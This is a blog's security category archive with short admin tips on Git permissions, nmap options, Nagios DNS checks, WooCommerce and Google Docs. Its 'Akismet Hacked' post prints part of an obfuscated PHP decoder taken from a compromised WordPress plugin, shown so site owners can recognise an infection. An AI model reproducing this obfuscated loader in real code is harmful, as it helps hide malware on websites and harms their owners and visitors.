Category Archives: Security

Does Git change file permissions?

Yes it does. Don’t go working away, for instance, putting you /etc directory in git and then switching branches. Git may change your directories to 755 and your files to 644 which will cause the system problems with security, and may even prevent booting. look at etckeeper or this tutorial for more information about keeping /etc in a git repo, but the answer to “Does Git change file permissions?” is a definitive “Yes”

Posted in Security, Server Admin, Web Development | Tagged | Leave a comment

nmap scans ips and ports

A useful linux/unix tool, nmap scans ips and ports of given hosts: Nmap 5.21 ( http://nmap.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: Input from list of hosts/networks -iR <num hosts>: Choose random targets –exclude <host1 [,host2][,host3],…>: Exclude hosts/networks –excludefile <exclude_file>: Exclude list from file HOST DISCOVERY: -sL: List Scan – simply list targets to scan -sP: Ping Scan – go no further than determining if host is online -PN: Treat all hosts as online — skip host discovery -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -PO[protocol list]: IP Protocol Ping -n/-R: Never do DNS resolution/Always resolve [default: sometimes] –dns-servers <serv1 [,serv2],…>: Specify custom DNS servers –system-dns: Use OS’s DNS resolver –traceroute: Trace hop path to each host SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans –scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idle scan -sY/sZ: SCTP INIT/COOKIE-ECHO scans -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast mode – Scan fewer ports than the default scan -r: Scan ports consecutively – don’t randomize –top-ports <number>: Scan </number><number> most common ports –port-ratio <ratio>: Scan ports more common than </ratio><ratio> SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info –version-intensity <level>: … Continue reading

Posted in Security, Server Admin, Tech Tips | Tagged , , , | Leave a comment

How to do a Random Drawing / pick at random using Excel

Are you running a contest or sweepstakes an need a system to pick random winners out of a pool of names? You could take the old-school approach of writing names on business cards and pulling them out of a fishbowl, or you could use Microsoft Excel. Put the names in an excel sheet. add a column and put =RAND() in it. it will give a random number that is recalculated every time a change is made on the sheet. choose that column and click sort “a-z” (or z-a). it won’t matter because each time you do it will randomize the names. Just pick the top one (or top 10) after sorting it.

Posted in Random, Security, Tech Tips | Tagged , , , , , , , | 1 Comment

nagios check_dns / check_ip example

Need to monitor an IP address / DNS entry with Nagios? Nagios has a plugin called check_dns just for that. The check commands are defined in this file: /etc/nagios-plugins/config/dns.cfg # ‘check_dns’ command definition define command{ command_name check_dns command_line /usr/lib/nagios/plugins/check_dns -H www.google.com -s ‘$HOSTADDRESS$’ } # ‘check_dig’ command definition define command{ command_name check_dig command_line /usr/lib/nagios/plugins/check_dig -H ‘$HOSTADDRESS$’ -l ‘$ARG1$’ } here is an alternate version I wrote to check the IP of a host, I could have used check_ip because I don’t think that command is taken, but instead I used my_check_dns: #my_check_dns command, checks to make sure a hostname resolved to a specified IP address: define command { command_name my_check_dns command_line /usr/lib/nagios/plugins/check_dns -H $ARG1$ -a $ARG2$ } this is how it would be implemented in a service: define service{ use generic-service ; Name of service template to use host_name mysite.com service_description check dns check_command my_check_dns!www.mysite.com!123.456.78.90 } Man Page: check_dns v1.4.14 (nagios-plugins 1.4.14) Copyright (c) 1999 Ethan Galstad <nagios @nagios.org> Copyright (c) 2000-2008 Nagios Plugin Development Team <nagiosplug [email protected]> This plugin uses the nslookup program to obtain the IP address for the given host/domain query. An optional DNS server to use may be specified. If no DNS server is specified, the default server(s) specified in /etc/resolv.conf will be used. Usage:check_dns -H host [-s server] [-a expected-address] [-A] [-t timeout] [-w warn] [-c crit] Options: -h, –help Print detailed help screen -V, –version Print version information -H, –hostname=HOST The name or address you want to query -s, –server=HOST Optional DNS server you … Continue reading

Posted in Security, Server Admin | Tagged , , , , | 1 Comment

Remove WooCommerce Generator Tag

If you would like to remove the Remove WooCommerce Generator Tag from the <head> section of your WordPress installation, you can add the following line somewhere, perhaps in your wordpress functions.php file: remove_action(‘wp_head’, array($GLOBALS[‘woocommerce’],’generator’)); I’ve updated the code to work with the most recent version of Woo Commerce, try adding this to the functions.php file of your WordPress theme: function remove_woo_commerce_generator_tag() { remove_action(‘wp_head’,array($GLOBALS[‘woocommerce’], ‘generator’)); } add_action(‘get_header’,’remove_woo_commerce_generator_tag’); That will prevent the following line from being shown in your HTML code: <!– WooCommerce Version –> <meta name=”generator” content=”WooCommerce 1.5″ />

Posted in Security, Tech Tips, Web Development | Tagged , , , , | 8 Comments

Google Docs: Share Outside My Organization (solved)

If you’re facing the problem with Google Docs where the “Users can share documents outside this domain” option doesn’t work, or the following issues, see the solution below on how to fix this. These are the problems reported by others about Share Google Docs Outside Your Organization: When I’m in the sharing settings in the document there is NO option to share out of organization. I disabled the option “Users can share documents outside this domain” several time ago and now, I reactivated it in order to share documents with users outside my domain. When I want to share any document with people outside the domain I am not able to get the option to do that. When viewing document share options, I can’t see the toolbar where I am asked to allow people outside the domain to view or edit the document. When I try to get a public link to the document, I only have the option to get it for people inside the domain. Control panel options are set properly but no change is performed in Google Docs. I have another google apps domain account where I’m able to do that. In that account I’ve never disabled the share with people outside the domain. I suspect the problem comes when you disable public sharing for the very first time and then you want to reactivate it again. I don’t have the option ‘Users can publish documents to the public internet’ available. I have multiple Google Domains, to … Continue reading

Posted in Security, Software, Web Development | Tagged , , , , , , , | 11 Comments

Akismet Hacked

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks. If any of these files are showing up in your plugins folder, you may be the subject of an attack: .akismet.cache.php .akismet.bak.php .akismet.old.php class-akismet.php db-akismet.php One akismet.php file that I found started out something like this: <?php if (!function_exists(“TC9A16C47DA8EEE87”)) { function TC9A16C47DA8EEE87($T059EC46CFE335260) { $T059EC46CFE335260 = base64_decode($T059EC46CFE335260); $TC9A16C47DA8EEE87 = 0; $TA7FB8B0A1C0E2E9E = 0; $T17D35BB9DF7A47E4 = 0; $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]); $TBF14159DC7D007D3 = 3; $T77605D5F26DD5248 = 0; $T4A747C3263CA7A55 = 16; $T7C7E72B89B83E235 = “”; $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260); $T43D5686285035C13 = __FILE__; $T43D5686285035C13 = file_get_contents($T43D5686285035C13); $T6BBC58A3B5B11DC4 = 0; preg_match(base64_decode(“LyhwcmludHxzcHJpbnR8ZWNobykv”), $T43D5686285035C13, $T6BBC58A3B5B11DC4); for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) { if (count($T6BBC58A3B5B11DC4)) exit; if ($T4A747C3263CA7A55 == 0) { $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]); $T4A747C3263CA7A55 = 16; } if ($T65CE9F6823D588A7 & 0x8000) { $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4); $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4); if ($TC9A16C47DA8EEE87) { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 – $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4]; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } else { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]); $TBF14159DC7D007D3++; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++]; $T65CE9F6823D588A7 <<= 1; $T4A747C3263CA7A55–; if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) { $T43D5686285035C13 = implode(“”, $T7C7E72B89B83E235); $T43D5686285035C13 = “?” . “>” . $T43D5686285035C13; return $T43D5686285035C13; } } } }; ?> If you want the PHP code, which is obfuscated, for the akismet.php file I came … Continue reading

Posted in Security, Web Development | Tagged , , , | 1 Comment